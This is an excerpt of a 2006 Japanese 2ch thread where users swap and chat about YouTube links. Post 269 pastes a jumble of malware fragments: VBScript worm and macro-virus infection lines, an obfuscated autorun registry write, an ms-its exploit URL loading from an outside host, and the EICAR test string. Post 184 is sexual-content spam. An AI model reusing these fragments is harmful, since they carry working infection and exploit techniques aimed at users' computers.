147 :可愛い奥様:2006/12/09(土) 17:25:38 ID:MJvC20MD
>>139
>>141
いやー笑った!私も2chで涙が出るほど笑ったのは初めて
てかここ何年も涙出るほど笑った記憶ないよ
ストレス解消になった、ありがとう!

148 :可愛い奥様:2006/12/09(土) 21:25:00 ID:R4QL848o
http://www.youtube.com/watch?v=FfoQsZa8F1c

149 :可愛い奥様:2006/12/09(土) 21:54:36 ID:R4QL848o
http://www.youtube.com/watch?v=ivf4k8WABJw&mode=related&search=

150 :可愛い奥様:2006/12/09(土) 22:01:53 ID:R4QL848o
部屋が外人っぽい
http://www.youtube.com/watch?v=A1yGVqyLF_g

151 :可愛い奥様:2006/12/09(土) 22:31:24 ID:wbxhdnac
おながい!誰かこの続き探して〜〜!
ttp://www.youtube.com/watch?v=-_fI0nTlexk
踊り覚えたいw

152 :可愛い奥様:2006/12/09(土) 22:36:17 ID:R4QL848o
http://www.youtube.com/watch?v=oSKYf2QtwKY

153 :可愛い奥様:2006/12/09(土) 23:45:12 ID:XLcsBxEV
>>150
若いっていいね。


154 :可愛い奥様:2006/12/10(日) 00:34:56 ID:raONrRfC

ttp://www.youtube.com/watch?v=V994xXxzNHs&NR
↑の「ガーナ大使役」ってニャホニャホタマクロー?

ニャホ
ttp://pds.exblog.jp/pds/1/200504/15/91/b0004791_131547.jpg

155 :可愛い奥様:2006/12/10(日) 00:55:12 ID:9k8r73Rt
子猫の動画ください。
できれば犬のお母さんが面倒見てる奴がいいです。

156 :可愛い奥様:2006/12/10(日) 01:09:40 ID:aCndmlKC
>>155
ttp://www.youtube.com/results?search_query=cat

97000件以上あるから好きなのを保存汁

157 :可愛い奥様:2006/12/10(日) 01:25:34 ID:kBjfi9GB
ttp://www.youtube.com/watch?v=pYQ84yUYN1E

ド・・・ドナルド・・・・・・゜・(ノД`)・゜・。

158 :可愛い奥様:2006/12/10(日) 04:23:16 ID:6BnZTgQb
>>157
!!!

159 :可愛い奥様:2006/12/10(日) 04:27:07 ID:iQAJz0ID
世界一ヘタなボーカル・・・

http://www.youtube.com/watch?v=XkMWdI2IKiw

160 :可愛い奥様:2006/12/10(日) 04:47:06 ID:3k0nroKr
みんな、これのタネ分かる?
http://www.youtube.com/watch?v=BXXlR9uOZ54

161 :可愛い奥様:2006/12/10(日) 09:48:53 ID:NWxwruGH
>>159
ごめん。最後まで聞けなかった〜。
イントロの不安を抱かせるヘタクソな演奏。
不安を突き抜けるほどの音程で歌う人。
どうして、あの人が歌うの〜?なぞ。

162 :可愛い奥様:2006/12/10(日) 15:16:45 ID:5yRP52Yn
このレッサーパンダかわいいw
http://www.youtube.com/watch?v=4RWFvucbeIw&mode=related&search=

163 :可愛い奥様:2006/12/10(日) 16:25:37 ID:3fuE4lnk
>>161
コメント読みながら見たらわかった。
特に出す時のほうがよくわかる。

164 :163:2006/12/10(日) 16:26:13 ID:3fuE4lnk
まちがえました。
>>160でした。

165 :可愛い奥様:2006/12/10(日) 17:21:50 ID:9k8r73Rt
>>162
レッサーパンダってほんとにパンダ科なんですか?違うでしょう

166 :可愛い奥様:2006/12/10(日) 17:25:14 ID:UrkmLDS1
>>162(;´Д`)ハァハァした
ベッキーへの顔面攻撃ワロス


167 :可愛い奥様:2006/12/10(日) 19:40:31 ID:DVWKwpeo
>>162かわええええええええええええ(*´д`*)ハァハァ

168 :可愛い奥様:2006/12/10(日) 22:32:56 ID:ly8UfKkq
ヒルトン姉妹みたいなカワイコちゃん三人組の歌手。
こんな綺麗なコがいるんだなー!

http://www.youtube.com/watch?v=tfp4_05M0vY

169 :可愛い奥様:2006/12/10(日) 23:23:25 ID:wjEI/R2/
(´・ω・`)(´・ω・`)(´・ω・`)(´・ω・`)(´・ω・`)
http://www.youtube.com/watch?v=Gb0Gak88lDA

170 :可愛い奥様:2006/12/10(日) 23:29:27 ID:wjEI/R2/
(´;ω;`)ウッ

171 :可愛い奥様:2006/12/10(日) 23:32:01 ID:wjEI/R2/
|ω・`) ジィ〜ッ

172 :可愛い奥様:2006/12/10(日) 23:40:14 ID:wjEI/R2/
http://www.youtube.com/watch?v=Pu88gb1EpmI&mode=related&search=

173 :可愛い奥様:2006/12/11(月) 05:15:47 ID:OdHJU2Fa
いつの間にかテンプレから消えてるけど
説明のないリンクは踏まずに無視が鉄則ですからご注意ください

174 :56:2006/12/11(月) 07:06:42 ID:Q8NeRrd2
http://www.youtube.com/watch?v=Kwne-4DTRP4&NR
お笑いのページから偶然見つけられました。
伊集院と記憶違いしてたのは荒又さんでしたwごめんなさい。
この人の他の映像も見てみたいです。

まぁ…誰も探してくれてなかったようだけど…グスンw


175 :可愛い奥様:2006/12/11(月) 07:17:35 ID:IqANuUdk
>>174
http://www.youtube.com/watch?v=kXBStXUFcbU
これしか見つけられなかった。ごめん。

176 :56:2006/12/11(月) 08:11:24 ID:Q8NeRrd2
>>175
ちょwwwwそっちじゃなくてwしかも出方が地味w


ttp://www.youtube.com/watch?v=ede_VGCrm4w&mode=related&search=
たけしのウルトラクイズイヨマンテの夜 左端、宅の隣で遠慮がちに踊ってるのは岡村?

ttp://www.youtube.com/watch?v=7mo-vevbM2s&mode=related&search=
イヨマンテお詫び

177 :可愛い奥様:2006/12/11(月) 08:31:27 ID:n38Fz+Eu
>>165
パンダ科だお

178 :可愛い奥様:2006/12/11(月) 09:24:17 ID:X+cwDP8Y
>>137-138さん、ありがとうございます。
長年の「?」がすっきりしました!

179 :可愛い奥様:2006/12/11(月) 13:05:44 ID:DaO4gSp3
http://www.youtube.com/watch?v=4SshoJ0cPcE
強くなりたい男たち

180 :可愛い奥様:2006/12/11(月) 14:25:22 ID:IjzwCb5j
>>179 リアルで声あげて笑った

181 :可愛い奥様:2006/12/11(月) 14:41:10 ID:oUjPw+jd
>>179
が、頑張れ!w

182 :可愛い奥様:2006/12/11(月) 14:51:15 ID:mq30bAAp
>>176
イヨマンテ〜wwwww


183 :可愛い奥様:2006/12/11(月) 16:33:05 ID:c+pwT3VC
このスレ面白しれ〜wwww
>>141
昔の、モンティーパイソン思い出したよ。

184 :リアルプレイヤーもってるやつ来い:2006/12/12(火) 01:45:11 ID:gjz0PTEe
http://cpz.to/movie-list/1519.htm

ここ開いてNo.1を左クリックして見てみろ

世の中の女がいかにスケベかが伺える

即金30〜50万で簡単に股開きやがる

185 :可愛い奥様:2006/12/12(火) 02:47:03 ID:vph3tcKQ
中川翔子の歌う聖子曲。
見てたらはまりました。少しシャープするけどうまい。
白いパラソル
http://www.youtube.com/watch?v=qyhoRZS8dn0
渚のバルコニー
http://www.youtube.com/watch?v=jzC2jhApkVI
Only My love
http://www.youtube.com/watch?v=8APjp7cLyqs
硝子のプリズム
http://www.youtube.com/watch?v=c_AtJk05Vgg
レモネードの夏
http://www.youtube.com/watch?v=plhC46v7vu0
風は秋色
http://www.youtube.com/watch?v=ZvHZHeF2wco
他略


186 :可愛い奥様:2006/12/12(火) 04:36:00 ID:LwxEI8qS
しょこたん歌上手なのね。そこいらの歌手よりいいわ。

187 :可愛い奥様:2006/12/12(火) 05:00:05 ID:ziSuN5p5
>>186
うん。こりゃ上手いなぁ(゚∀゚)

188 :可愛い奥様:2006/12/12(火) 05:18:04 ID:vph3tcKQ
歌うまつながりで本格的なやつを。
The X FACTORという皆さんのお好きなアメリカオーディションもの。
審査結果と人種差別問題の関係でも話題になってるみたい。
ファイナルステージに残ったLeonaの歌唱、これからデビュー確実です。
虹のかなたに
http://www.youtube.com/watch?v=QLr1sBQ5gpE
オールウェイズラビュ〜
http://www.youtube.com/watch?v=9eGOwdLSUrM
Lady Marmalade ぎちぎちやや〜や〜や
http://www.youtube.com/watch?v=JWeF1zOZKcY
他もいいよ

189 :可愛い奥様:2006/12/12(火) 05:36:27 ID:vph3tcKQ
>>188
と戦っているライバルRAYくんのマイウェイ。おみそれしました。
http://www.youtube.com/watch?v=AoY7MbHAcws
今回二人に敗れてしまったBEN。三者三様、レベル高い。
http://www.youtube.com/watch?v=fS1YWvubDIk

190 :リアルプレイヤーもってるやつ来い:2006/12/12(火) 05:55:02 ID:gjz0PTEe
美勇伝

http://www.youtube.com/watch?v=4D7peUe_vjo

エロすぎ><

191 :可愛い奥様:2006/12/12(火) 08:01:57 ID:Av9eKD8h
>>185
【音楽】“松田聖子マニア”しょこたんこと中川翔子…来年2月に“リスペクトソング”発売[12/11]
http://news18.2ch.net/test/read.cgi/mnewsplus/1165809927/

192 :可愛い奥様:2006/12/12(火) 08:08:22 ID:rY/do2FO
>>188
レオナすごいなぁ〜と思ってたら
審査員にサイモンがいるw
こいつこんなことばっかりしてんだなwww

193 :可愛い奥様:2006/12/12(火) 08:20:18 ID:ziSuN5p5
>>190
あらイイですね〜

194 :可愛い奥様:2006/12/12(火) 09:23:16 ID:+OLcnA94
>>190
美勇伝の髪の長い子って整形かな?
他のPVと激しく顔が違うんだけど。

195 :可愛い奥様:2006/12/12(火) 09:39:45 ID:mjLtW3jF
>>189
うーんRAYくん爽やかな笑顔パフォーマンスやられちゃいますな。

196 :可愛い奥様:2006/12/12(火) 10:14:34 ID:UElFSZRc
ヲチ板に自スレ持ち炉李声歌手まさごろ(44歳)のピアノ演奏
公式日記で既婚女性を毎日羨望混じりに批判してます。
ttp://white.ap.teacup.com/masagoro/
例:主婦は股間使い、家庭の主婦は奴隷根性

↓まさごろガクブル動画
http://www.youtube.com/watch?v=uLMa7WxKWUE

197 :可愛い奥様:2006/12/12(火) 11:22:10 ID:E3EBeMnl
これ知っている人いるかなあ80年代のビデオ
二人組の怪しい日本人女性が歌っているんだけど
「アンタも忍者〜アタシも忍者〜目潰しなげてドロンドロン」
中学生のとき見て強烈で頭がから離れなかったフレーズ

http://www.youtube.com/watch?v=cXZanbZ6PWs

198 :可愛い奥様:2006/12/12(火) 11:31:20 ID:cr0vpKfY
>>111
飛ぶとこ一緒に見せてくれorz

199 :可愛い奥様:2006/12/12(火) 11:59:56 ID:rsg0hvgv
>>197
うひー懐かしい、フランクチキンズだっけ?
デュランデュランやカルチャークラブ華やかしき頃に
何気に居たよねw
当時みんなが(゚д゚)ナニコレ状態だったw

200 :可愛い奥様:2006/12/12(火) 12:11:43 ID:hUkLJN8Z
>>197
電気GROOVEがサンプリングしてたよね。

http://www.youtube.com/watch?v=bGmXIpBQLVY

すんません。でてこなかった。権利問題だね。


201 :可愛い奥様:2006/12/12(火) 14:04:42 ID:fFTRDS0n
しょこたん、ちゃんとパパの血を受け継いでるんだね〜

202 :可愛い奥様:2006/12/12(火) 14:31:54 ID:XoElY1U1
>>190
モー娘の子がいるよね?
こんな格好させられてちょっとかわいそうだ。
いやとはいえないんだろうなあ。

203 :可愛い奥様:2006/12/12(火) 15:31:20 ID:Wr7riTB6
http://www.youtube.com/watch?v=HBVgJZyPQKU

ホットぺッパー+デスノート

204 :可愛い奥様:2006/12/12(火) 17:07:05 ID:7LU5W8sw
>>203 うまいwwwアマデウス編も作ってほしいよ

205 :可愛い奥様:2006/12/12(火) 18:35:47 ID:0nqOJvfC
1993年のMステSPオープニング
なんとも懐かしい面々&すごい勘違いの女性司会アナに対する
タモさんの冷めたコメントにワロス
http://www.youtube.com/watch?v=QaTc5SGQqmU

206 :可愛い奥様:2006/12/12(火) 18:51:46 ID:Fw3hnkHk
>>162
これ前編見たいお。

207 :可愛い奥様:2006/12/12(火) 18:52:00 ID:E3EBeMnl
すごい勘違いの女性司会アナ..誰かと思いきや有賀さつきか

208 :(´・ェ・`) ◆Joy/AegLJM :2006/12/12(火) 19:22:24 ID:gjz0PTEe
www

209 :可愛い奥様:2006/12/12(火) 19:54:52 ID:j+f08ufp
>>205
1993てこた小室ブームが来る前のビーイング系旋風が吹き荒れてたときだけどTボランしかいないね。

210 :可愛い奥様:2006/12/12(火) 20:31:29 ID:Ydf8qaKZ
>>95
超亀だけど、このプログラム大好きで見たかったのよ〜ありがd奥様。
20年以上経ってなお色褪せてなくて、いつまでも見ていたい素晴らしさだわ。


211 :可愛い奥様:2006/12/12(火) 21:27:06 ID:ziSuN5p5
JYONGRI(ジョンリ) プチブレイクの予感
http://www.youtube.com/watch?v=ouBCNhRf8m4

212 :可愛い奥様:2006/12/12(火) 21:28:00 ID:xQwi3HqJ
>>191
しょこたんって、聖子マニアだったんだw
だから今、元SAYAKAの元カレと付き合ってるんだ?

213 :可愛い奥様:2006/12/12(火) 23:51:10 ID:S/cdOokg
>>162
これかわええええええーーー
ぶら下がってるのとくにかわええ!

214 :可愛い奥様:2006/12/13(水) 01:40:47 ID:oOm+mBb0
こまねこ
http://www.youtube.com/watch?v=hvtovybfr8A

215 :可愛い奥様:2006/12/13(水) 08:19:24 ID:tjamXoLO
>>214
うわあああ、かわええええ!!
NHKもニャッキ(←嫌い)とか放送せんでこまねこシリーズ化して放送しろや!

216 :可愛い奥様:2006/12/13(水) 08:40:35 ID:OwPkKmwt
髭がないからくまかと思った〜

217 :可愛い奥様:2006/12/13(水) 09:57:03 ID:rXOF7q3x
>>214
かわいいねぇ。
人形の動きが「どーもくん」と同じでいいね。

218 :可愛い奥様:2006/12/13(水) 12:08:48 ID:W9iJpz9u
ガイシュツだったらすまん。

こっち見んな!www
そしてこっちに来るな!!wwwwww
ttp://www.youtube.com/watch?v=GP5D2apU2SE&eurl=

219 :可愛い奥様:2006/12/13(水) 12:29:53 ID:WfRsvRlH
>>218
((((( ゚д゚ )( ゚д゚ )( ゚д゚ )( ゚д゚ )( ゚д゚ ))))))
  ((((( ゚д゚ )( ゚д゚ )( ゚д゚ )( ゚д゚ ))))))

220 :可愛い奥様:2006/12/13(水) 12:34:23 ID:VrsH3frG
>>218
これヤギ?

221 :可愛い奥様:2006/12/13(水) 12:41:48 ID:76kB5lj9
>>220
ラクダの仲間のアルパカ

222 :可愛い奥様:2006/12/13(水) 13:01:36 ID:VrsH3frG
>>221
dクス
これがアルパカね

223 :可愛い奥様:2006/12/13(水) 13:36:39 ID:5aHgS8hB
>>215
長年のニャッキファンに喧嘩売ったなゴルァ!

224 :可愛い奥様:2006/12/13(水) 14:04:15 ID:qf2pIOy+
>>218
あぁぁ。この中にまみれたい。見つめられたい。

225 :可愛い奥様:2006/12/13(水) 15:35:06 ID:VrsH3frG
ペプシのCMでコークを買う少年
http://www.youtube.com/watch?v=ZjY1EtPQ3NQ&eurl=

226 :可愛い奥様:2006/12/13(水) 16:27:28 ID:oFc3JX5p
>>174
亀でスマソ
初めて見た!なんだこりゃーだね。スゴス

227 :可愛い奥様:2006/12/13(水) 17:08:01 ID:3J+3aoqB
>113

すっごく遅レス。
テレ東で深夜に「ニューヨークの美女と野獣」ってタイトルで放送
してたよね。
すごく泣けるラストだったよ。思い出した。ありがとう。

228 :可愛い奥様:2006/12/13(水) 17:10:25 ID:miwXdhys
>>225
日本だと放送無理だね。
他社を侮辱してではなく、残された品をもったいないとか騒がれそうw

229 :可愛い奥様:2006/12/13(水) 17:27:17 ID:vvVb6i2q
>>174の見た。
何コレすごくない?
最初、伊集院と荒俣先生を間違えた174にワラタけど、
そんなのぶっとんでしまうよ、この映像は。
この人何者なの〜?

230 :可愛い奥様:2006/12/13(水) 21:18:59 ID:1G8UlO72
これワロタ「Winnyの木」既出だったすいません。
つーか、日本もうだめかもわからんね
http://www.youtube.com/watch?v=MWqdDI1-F2M

231 :可愛い奥様:2006/12/13(水) 22:29:44 ID:6sYbr+Ef
>>230
バロスww

232 :可愛い奥様:2006/12/13(水) 23:08:39 ID:9Ga+5ZO7
オチに日立がwwwwwww

233 :可愛い奥様:2006/12/13(水) 23:27:48 ID:YkKaC208
>>230
なげーって思ったけどオチは良くできてた

234 :可愛い奥様:2006/12/13(水) 23:30:40 ID:qlpch+cL
>>230
もう駄目だけど
こういうものを作る洒落っ気があるだけマシか。
この歌、こんな長い歌詞だと初めて知った。

235 :可愛い奥様:2006/12/14(木) 00:02:12 ID:fuQQ6ne9
映画やるんだね。
こまねこ男の子だと思ってたよ。
んでもって、いぬこさんはうさぎだと…。


236 :可愛い奥様:2006/12/14(木) 00:05:30 ID:OwPkKmwt
>>230
トレンドマイクロはいかんだろーw

237 :可愛い奥様:2006/12/14(木) 00:16:05 ID:XuhTZsX9
もう上映しているのね、こまねこ。
見に行こうかな。

238 :可愛い奥様:2006/12/14(木) 00:41:12 ID:tiPCoBcn
>225
コカコーラとしては二本売れただけでもよしとするか。

239 :可愛い奥様:2006/12/14(木) 01:39:24 ID:1tmEC0D6
>>225
つーかリッチなガキだなwwww

240 :可愛い奥様:2006/12/14(木) 01:44:02 ID:4hyUrBMM
>>229
間違いなく念力だねw

241 :可愛い奥様:2006/12/14(木) 02:02:17 ID:gAm6OnjS
>>229
手品板にスレがあったよ 23才だって
癸原髭功
http://hobby8.2ch.net/test/read.cgi/magic/1162663927/

242 :可愛い奥様:2006/12/14(木) 02:08:24 ID:uMj7pJN6
岡村さん、youtubeの詐欺広告にパニクる
http://www.youtube.com/watch?v=O81J2nJhdZw

243 :可愛い奥様:2006/12/14(木) 02:20:22 ID:5uSxZHSu
>>230
ワロタw
なにげに小学校が多いねー


244 :可愛い奥様:2006/12/14(木) 03:10:24 ID:dfcIP2qf
お願い。

探偵ナイトスクープの
アホバカ分布図が見つからない。
上岡で検索しても、出てこない。
誰か教えて。。。・゚・(ノД`)・゚・

245 :56:2006/12/14(木) 03:25:12 ID:Vgh1KXZB
>>244
ttp://www.youtube.com/watch?v=CXEbAYaJqD8&mode=related&search=
ほい、どっかで観たな〜と、ありました。7分割されてて長編です。


ttp://www.youtube.com/watch?v=IGgxz8_TGpQ&mode=related&search=
おまけ:上岡龍太郎 vs. 占い師w
引退してなかったら、唯一のアンチ細木だったろうにw対決見たかった〜惜しい〜

246 :可愛い奥様:2006/12/14(木) 03:41:39 ID:dfcIP2qf
>>245
ありがとーーーーーっ
うれひぃっ

247 :可愛い奥様:2006/12/14(木) 07:38:54 ID:kP6kY8Fn

http://www.youtube.com/watch?v=40EqFauF1n4&eurl=
http://www.youtube.com/watch?v=OiXHogMo44Q

248 :可愛い奥様:2006/12/14(木) 15:42:55 ID:S1rP9kC1
超かわいいホワイトタイガーの子供(♂と♀)
http://www.youtube.com/watch?v=34b2sg8KhXc&mode=related&search=

249 :可愛い奥様:2006/12/14(木) 19:57:22 ID:Pc4ZNDzd
15歳の椎名林檎
http://www.youtube.com/watch?v=WCxq1p7JyvI&NR

250 :可愛い奥様:2006/12/15(金) 02:06:46 ID:G0BFk34X
ベビーパウダーかな?
http://www.youtube.com/watch?v=stILqebNHXs&mode=related&search=

251 :可愛い奥様:2006/12/15(金) 02:27:01 ID:Kv5QeBe1
>>245
上岡つながり。
6分以降、細木の占いに意見する和泉のコメントの音声の二箇所が
後日吹き替えされるのが気になった。
たぶん細木が「58年に江川の成績最高」と記述していたのを
和泉が「本当は56年じゃないか」とツッコミを入れたかったのに
元の音声では「57年」と口に出して話してしまったんだと思う。
http://www.youtube.com/watch?v=Bm8CBvIEnbM

252 :可愛い奥様:2006/12/15(金) 06:52:29 ID:ZBAQTSxd
居酒屋オフにてオナニーについて語る女性たち
http://www.youtube.com/watch?v=5h6FA1QkBYQ&eurl=

253 :可愛い奥様:2006/12/15(金) 11:20:34 ID:B8tVTPpP
ヤラセくせーw

254 :可愛い奥様:2006/12/15(金) 11:58:36 ID:yEzqIAOI
>>245
若林正人って懐かしいな…久米と喧嘩して番組降りてからあんまり見なくなったな。
久米の番組でてた頃調子に乗ってる感じでうざくなってたからほっとしたけど。
こういう人はラジオとか司会業に行くのかな。

255 :可愛い奥様:2006/12/15(金) 21:38:05 ID:pOwtA9fw
高校時代の藤原紀香
http://www.youtube.com/watch?v=I62kO-KGnHg

256 :可愛い奥様:2006/12/16(土) 00:26:04 ID:zrT1zvU6
なんか楽しそう
http://www.youtube.com/watch?v=AJzU3NjDikY

257 :可愛い奥様:2006/12/16(土) 01:47:58 ID:fi0nozeH
ネスカフェのCM探してたら見つけた。
なぜか字幕つきで思わず歌ったw
ロバータ・フラックもオリジナルじゃないのよね。
でも彼女が歌うとやっぱり素敵。
懐かしいとお思いの方どうぞ。この時間に癒されます。
ttp://www.youtube.com/watch?v=4mpqXu0z3wU

258 :可愛い奥様:2006/12/16(土) 05:49:25 ID:0J+tXHqM
僕が9月末で会社を辞めてから思ったことは

世の中図々しいくらいの神経の持ち主の方が良い思い出来るってことです

仕事に関しても女に関しても全てにおいて言えることなんです

259 :可愛い奥様:2006/12/16(土) 06:19:02 ID:kXfKxAAl
>>257
歌詞の「OH OH OH …」の箇所がハングルに見えて…orz

260 :可愛い奥様:2006/12/16(土) 10:04:35 ID:8f1sqQhS
>>257
懐かしいなあ。昔マリーンの歌詞カードで覚えたよー
マリーン探してこよっと。

ところで、確かようつべスレだったと思うんですが、南京大虐殺のやつを
見たのはここだった気がするんだけど、昨日専スレ整理してたら
過去スレ削除してしまったようで。
知ってる方がいたら教えてください。TV番組の録画だったような。

261 :可愛い奥様:2006/12/16(土) 19:13:09 ID:OUDxx/Rs
誰か、これのタネ教えて!
http://www.youtube.com/watch?v=hDJvK4dj5v4&mode=related&search=

262 :可愛い奥様:2006/12/16(土) 20:09:09 ID:a/grEID2
>>257
あー懐かしいねー。
これも好きだけどオープンアップのも好きだ。
けだるくっていいよねーネスカフェ

263 :可愛い奥様:2006/12/16(土) 23:35:10 ID:ZKevAZXk
「ちょっと!ちょっとちょっと!」
http://www.youtube.com/watch?v=YUgDUBVTTwc&mode=related&search=

264 :可愛い奥様:2006/12/17(日) 00:30:54 ID:NXnDqJZt
>>263
親キモ。

265 :可愛い奥様:2006/12/17(日) 00:32:11 ID:5/mev4rl
デフラグしたらyoutubeの音が大きくなった

266 :可愛い奥様:2006/12/17(日) 01:48:02 ID:69t2Sdne
ライオンに襲われる
http://www.youtube.com/watch?v=DeQ77OkiDp4
凄いスピードでびっくらこいた。

新入浴方
http://www.youtube.com/watch?v=Yvyp0-gAgsU
すねがぁぁぁ!

267 :可愛い奥様:2006/12/17(日) 02:20:27 ID:4lRUzTeS
Hindi - Thriller
http://www.youtube.com/watch?v=IGiixK8t3qo

268 :可愛い奥様:2006/12/17(日) 03:22:08 ID:D+QFs73h
>260
前スレにあった、たかじんのやつかな。
南京大虐殺について。
http://www.youtube.com/watch?v=ZzPgi4Wn9Zk

269 :可愛い奥様:2006/12/17(日) 04:42:00 ID:ooDrWVfB
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
܃ܷܵܶޫޭॢ

270 :可愛い奥様:2006/12/17(日) 11:10:24 ID:RkW9m9ST
しょこたんの聖子の歌、いいなー、のびやかで。
しょこたん好きになったわ、単純だが

271 :可愛い奥様:2006/12/17(日) 19:39:59 ID:l+DpWn6+
大阪名物(1:15ごろから始まるよ)
http://www.youtube.com/watch?v=MwcQr0MJRrM&mode=related&search=%E9%87%91%E5%8D%B5

272 :可愛い奥様:2006/12/18(月) 00:27:32 ID:tc4uyoNp
http://www.cisco-records.co.jp/cgi/title/trance/detail_160952.php

273 :可愛い奥様:2006/12/18(月) 07:13:56 ID:mYNMfwGF
>>270
誰かと思えばサラ金の女じゃないの。
仕事欲しさにあんなCMに出るなんて人間として最低。

274 :可愛い奥様:2006/12/18(月) 09:01:04 ID:BOmd+oRD
このいスレってウイルス貼る必要ないじゃん。
ムカツク。

275 :可愛い奥様:2006/12/18(月) 14:50:29 ID:cO1qMmMm
ホットペッパーのCM(本物のほう)面白いわー。でもこれだけ見れないのは私だけすか?

276 :可愛い奥様:2006/12/18(月) 16:31:38 ID:uLnfpdF5
お相撲さんスゴイ!!

http://www.youtube.com/watch?v=pbf4ONL6X08&eurl=

277 :275:2006/12/18(月) 17:24:04 ID:cO1qMmMm
URL貼るの忘れたぽ。
http://www.youtube.com/watch?v=2dZ341_Nke4

278 :可愛い奥様:2006/12/18(月) 20:58:28 ID:4zTcL1ag
家庭か鬼女板でコント・漫才みたいに相手に「無理っす!無理っす!無理っす!」で通すものを見たのですが
どこのスレかも忘れてしまって、ご存知の方いらっしゃいませんか?保存したいです。

279 :可愛い奥様:2006/12/18(月) 21:41:18 ID:ApXhzI++
>>278
つ「無理っす YOUTUBE」

280 :可愛い奥様:2006/12/18(月) 22:01:42 ID:4zTcL1ag
>>279
ありがとう、落とせました。

人を怒らせる方法「放棄」
http://www.youtube.com/watch?v=2sKgVz79NZE
「もらい捨て」
http://www.youtube.com/watch?v=NzxfV-SuVeU&mode=related&search=

281 :可愛い奥様:2006/12/19(火) 05:54:09 ID:A1HF614v
http://www.youtube.com/watch?v=9xi9gWYz0oc&NR

282 :可愛い奥様:2006/12/19(火) 08:07:08 ID:qdbXJllM
>>281
妖精wwwww

283 :可愛い奥様:2006/12/19(火) 12:42:52 ID:gCqIucdZ
もうがいしゅつかもわかんないけど
http://www.youtube.com/watch?v=FVjDNcqpioM

久しぶりにお腹がよじれるくらい笑ったんだけどw

284 :可愛い奥様:2006/12/19(火) 14:29:28 ID:gH8XK1Ma
>>249
林檎、15歳にして渋い選曲・・・w
うちの母がレコード持ってたなぁ。

285 :可愛い奥様:2006/12/19(火) 14:56:13 ID:NWKXM/cj
>>283はFreezepop - Tenisu No Boifurendoだって。
人の面白さのつぼはいろいろですね。

286 :可愛い奥様:2006/12/19(火) 15:00:49 ID:gCqIucdZ
>>285
あんまおもしろくなかった?
私は大爆笑して何度も見てるんだけど
確かに人とつぼ違うかもw


287 :可愛い奥様:2006/12/19(火) 15:31:55 ID:/AyIeM8c
「あんまり」というか全然わかんなくて、逆に悔しい・・・
これは何かのパロディなの?>>283


288 :可愛い奥様:2006/12/19(火) 15:34:31 ID:gCqIucdZ
>>287
インディーズのテクノのバンドらしいよ。
2ちゃんのほかの板で笑ってたんだ。

289 :可愛い奥様:2006/12/19(火) 17:56:23 ID:U0mw+AiL
音楽ネタだと、ここかどっかで見たインド?のスリラーがヒットだった。
もうあれが新マイケルで良いよ。ちょっと表情がドリフだけど。

290 :可愛い奥様:2006/12/19(火) 17:57:50 ID:A1HF614v
ある女性の3年間
http://www.youtube.com/watch?v=CtDJq_5yle0

291 :可愛い奥様:2006/12/19(火) 17:58:13 ID:AIbELZxq
>>283
笑い所が解らぬまま終わった。スマソ

292 :可愛い奥様:2006/12/19(火) 19:08:57 ID:x0xD72M/
80年代懐かしいCM集40
ttp://youtube.com/watch?v=i0wE4KRFEZg


293 :可愛い奥様:2006/12/20(水) 00:43:08 ID:lEwc0qf7
超飛び出す絵本 不思議の国のアリス
http://www.youtube.com/watch?v=pCO_Rq6ixSc

294 :可愛い奥様:2006/12/20(水) 00:54:01 ID:pPsvsH/K
ちょっと下品だけど

http://www.youtube.com/watch?v=nVRL70mj7Ic&mode=related&search=

295 :可愛い奥様:2006/12/20(水) 01:52:29 ID:MqcIHoUM
中田久美「てめえらコノヤロー!」
生放送中、選手に激怒
http://www.youtube.com/watch?v=uENFBXDLtf4&eurl=

296 :可愛い奥様:2006/12/20(水) 12:24:09 ID:ZmpVQRLA
>>283
いや私は壺でしたw
一度目見たときは「は」って感じだったのだが
気になって2回目以降から癖になったw

297 :可愛い奥様:2006/12/20(水) 14:11:35 ID:2XU3Epvj
ようつべでキーワード入れて探すのって難しい。
ドラマの高校教師を探して桜井幸子って入れているのに
出てきたのは富豪刑事。


298 :可愛い奥様:2006/12/20(水) 17:28:45 ID:5PKVVCZe
http://www.youtube.com/watch?v=urFeIsct9Pc
増田こうすけ劇場 ギャグマンガ日和2 第06話 ソードマスターヤマト

299 :可愛い奥様:2006/12/21(木) 00:02:38 ID:VPIEnmPr
>>20
うわあ、懐かしい・・。
なんか80年代のものって見てると子供の頃を思い出して泣けてくるよ。

300 :可愛い奥様:2006/12/21(木) 18:03:49 ID:Kg05HiWT
化粧ってすごいね
http://www.youtube.com/watch?v=iYhCn0jf46U

301 :可愛い奥様:2006/12/21(木) 18:24:17 ID:bU6IGShY
http://www.youtube.com/watch?v=ElucxQ4prME
ふつうここまで言わすか?

302 :可愛い奥様:2006/12/21(木) 18:52:37 ID:K/xYGS/Z
>>300
化粧ってより、CG補正強烈!ワロス。

303 :可愛い奥様:2006/12/21(木) 19:47:56 ID:Jx4B9Twu
>302
これ笑うものじゃないでしょ


304 :可愛い奥様:2006/12/21(木) 19:51:38 ID:K49ccxZ8
>>255
デカイな糊化

305 :可愛い奥様:2006/12/21(木) 19:53:18 ID:K49ccxZ8
>>249
15歳で暗い歌歌ってんなー

306 :可愛い奥様:2006/12/21(木) 20:34:42 ID:5iGr8gGx
86イイヤシ ハゲド

